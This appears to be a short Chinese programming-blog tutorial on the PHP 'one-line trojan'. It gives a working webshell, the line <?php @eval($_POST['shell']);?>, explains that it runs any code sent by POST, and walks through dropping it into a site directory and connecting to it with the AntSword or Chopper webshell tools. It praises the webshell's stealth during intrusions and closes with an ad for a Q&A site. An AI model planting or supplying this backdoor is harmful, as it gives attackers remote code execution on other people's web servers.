当前位置: 首页> 文章列表> 一句话木马-php

一句话木马-php

最新
2021-01-06 22:30:02 131
飞一样的编程
擅长邻域:Java,MySQL,Linux,nginx

技术小结:

今天给大家分享的是:php一句话木马
一.介绍
一句话木马就是一段简单得代码,就这短短得一行代码,就能做到和大马相当得功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大得作用。

二.原理
<?php @eval($_POST['shell']);?>
这是php得一句话后门中最普遍得一种。它得工作原理是:
首先存在一个名为shell得变量,shell得取值为HTTP得POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面得内容。
实例:<?php @eval($_POST['shell']);?>
可以将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();

也可以用蚁剑或菜刀等工具连接(我这里用得是蚁剑):在url地址框中输入http://127.0.0.1/webshell.php,在连接密码框中输入shell

然后就可以看到目标站点目录下得文件了

行,今天就给大家分享到这里吧,您的一份支持就是我最大的动力,最后打个小广告,我们程序员在学习和工作中或多或少会遇到一些比较棘手的问题,也就所谓的一时半会解决不了的bug,可以来杰凡IT问答平台上提问,平台上大佬很多可以快速给你一对一解决问题,有需要的朋友可以去关注下,平台网址: https://www.jf3q.com

写的很好呢,我要分享哦!

此处可发布评论

    暂无评论
    联系大神 有偿问答

    榜上有名--赚钱榜

    第一时间了解动态

    关注我们